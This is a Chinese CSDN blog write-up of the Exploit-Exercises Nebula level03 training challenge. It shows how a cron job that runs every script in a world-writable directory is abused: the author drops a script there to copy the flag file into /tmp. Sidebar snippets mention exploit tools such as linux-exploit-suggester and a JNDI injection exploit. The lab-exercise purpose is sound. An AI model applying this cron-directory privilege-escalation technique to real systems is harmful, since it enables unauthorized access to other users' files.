i春秋 - Exploit-Exercises: Nebula - level03

最新推荐文章于 2019-01-13 22:20:22 发布
最新推荐文章于 2019-01-13 22:20:22 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: exploit 文章标签: exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scnu_jiechao/article/details/57130650
版权

About

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

思路

先进flag文件夹看看

cd /home/flag03
vim writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
     (ulimit -t 5; bash -x "$i")
     rm -f "$i"
done

程序逻辑

依次执行writable.d文件夹下的所有脚本,然后删除

根据题目可知系统会每隔几分钟执行writable.sh脚本,并且writable.d文件夹是所有人可写的。那么获取flag的思路之一,便可以是写一个获取flag的脚本放进writable.d文件夹里,执行结果重定向到/tmp中文件。

cd /tmp
vim hack
cat /home/flag03/flag > /tmp/flag03
chmod 755 hack
mv hack /home/flag03/writable.d/
cat /tmp/flag03

As for the time, good luck for you!

flag

jchalex
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
04-25
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
Nebula level03
无心插柳
05-10 7423
http://exploit-exercises.com/nebula/level03 Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, l
i春秋 - Exploit-Exercises: Nebula(1)
大博的博客
04-29 1483
还是老哥的锅,兴冲冲的给我说这个比赛很有意思,一脸懵逼的进来,但是绝对不会一脸懵逼的出去。这个对于我这个才是WEB方面的小白的我来说有点懵逼,最后百度了百度还是懂了一点。那就写下我做这个题的想法。nebula其实就是专门针对linux提权训练的一个靶机,就这个我需要理解很多知识顺便补充了一个find命令(这个find命令补充还是在我的博客里)find / -user flag00 -perm -4...
i春秋 - Exploit-Exercises: Nebula - level00
无节操
02-25 2387
AboutThis level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking dire
i春秋 - Exploit-Exercises: Nebula - level05
无节操
02-25 1029
AboutCheck the flag05 home directory. You are looking for weak directory permissions Nebula官网思路进去看看cd /home/flag05/ ll发现一个其他人可执行的.backup目录cd .backup/ ll看到其他人可读的backup-19072011.tgz 复制到/tmp解压cp backup-
linux-exploit-suggester:Linux特权升级审核工具
04-22
LES:Linux特权升级审核工具快速下载: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh有关LES用法和内部工作方式的详细信息: ...
CMS-Exploit-Framework:CMS 漏洞利用框架
07-10
chu@sh3ll-me:/tmp » git clone https://github.com/chuhades/CMS-Exploit-Framework.gitCloning into 'CMS-Exploit-Framework'...remote: Counting objects: 352, done.remote: Compressing objects: 100% (182/...
jndi-JNDI-Injection-Exploit
12-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。 (可选项 , 默认命令是mac下打开计算器,即"open /Applications/Calculator....
google-translate-exploit:Google翻译翻译漏洞
02-03
google-translate-exploit:Google翻译翻译漏洞
awesome-vm-exploit:分享有关vm和qemuscape漏洞利用的一些有用档案
02-02
awesome-vm-exploit:分享有关vm和qemuscape漏洞利用的一些有用档案
Nebula_level03
yuansunxue的专栏
01-29 332
exploit-exercises Nebula: level03 In level03 challenge of Nebula, we are told that there is a crontab running every couple of minutes. level03@nebula:/home/flag03$ ls -ltotal 8 drwxrwxrwx 2
Exploit-ExerciseNebula实践(四)
Yale的博客
01-13 465
获取15关卡的flag。 由题目的提示可知,这题需要用到strace,使用strace观察flag15的调用情况。 直接strace跟踪flag15 结果如下: 可以看到(图中受限于屏幕空间没有截全),flag15大量调用libc.so.6 再使用readelf查看 结果如下 可以看到程序对libc.so.6存在依赖,可题目没有提供。我们需要写libc.so.6到哪个路径,让.so...
ExploitExercises_Nebula_Level03
小黑话不多
12-26 816
题目设置定时任务,定时执行/home/flag03/writable.sh脚本: #!/bin/sh for i in /home/flag03/writable.d/* ; do (ulimit -t 5; bash -x "$i") rm -f "$i" done 可以看到,该脚本去执行writable.d目录下的程序。 获取shell过程如下: 1.
Exploit-ExerciseNebula实践(三)
Yale的博客
01-13 301
获取10,11关卡的flag。 题目提示我们,只用满足access()函数系统调用的条件,则flag10二进制程序会上传任何给出的文件。当然,我们需要做的就是让flag10读出token就可以了。 代码太长,就不贴出来了。 我们着重需要关注access函数,access函数用户是否有操作文件的权限,有的话则open,没有的话则error。 逻辑上看上去是没有问题的,但是代码忽略了一个情况:...
ExploitExercises_Nebula_Level01
小黑话不多
12-26 1375
题目源码如下: #include #include #include #include #include int main(int argc, char **argv, char **envp) { gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid);
i春秋 - Exploit-Exercises: Nebula - level06
无节操
02-25 1151
AboutThe flag06 account credentials came from a legacy unix system. Nebula思路题目提示“legacy unix system”,即可破用户密码。cat /etc/passwd | grep flag06得到 sudo apt install john vim flag06passflag06:ueqwOCnSGdsuM:9
i春秋 - Exploit-Exercises: Nebula - level01
无节操
02-25 2529
AboutThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?To do this level, log in as the level01 account with the password level01. Files for th
Exploit-exercises
MillionSky的专栏
04-09 2056
1 概述Exploit-Exercise是一个Linux平台下漏洞挖掘、分析的练习平台。网址为:https://exploit-exercises.com官方提供了个很多虚拟机、文档、挑战题目,用于学习各种计算机安全问题,如权限提升、漏洞分析、Exploit开发、调试、逆向工程和通用的网络安全问题。 目前有几个板块:Nebula、Protostar、Fusion、Main Sequence、Clo...
Exploit-ExerciseNebula实践(一)
Yale的博客
01-13 935
获取00关卡的flag。 题目提示需要查找以”flag00”账户运行的设置了SUID的程序,并提示我们可以从跟目录开始查找 找到了了之后执行这个程序,我们这个用户“level00”就或者“flag00”的权限,也就可以getflag了 那么怎么找到符合要求的程序呢? 首先切换到根目录 由于我们目前的登录的是level00,在搜索没有权限进入的目录时会出错,所以为了避免干扰需要将错误信息输入到/d...
linux-exploit-suggester2
最新发布
07-28
你好,感谢你的提问!针对 Linux 系统的漏洞利用建议工具有很多,其中一个常用的工具是 Linux-exploit-suggester 2。它是一个能够检测 Linux 系统中已知漏洞的脚本,以帮助系统管理员评估系统安全性并提供潜在的漏洞利用建议。 该工具可以通过分析运行中的 Linux 内核版本和已加载的模块来确定可能存在的漏洞利用。它会与 CVE(通用漏洞和暴露)数据库进行比对,找出可能适用于当前系统的已知漏洞。 要使用 Linux-exploit-suggester 2,你需要将该脚本下载到你的 Linux 系统上,并运行它来获取漏洞利用建议。请注意,这个工具只能检测已知的漏洞,因此及时更新和修补系统是保持系统安全性的重要步骤。 希望这个回答能够帮到你!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值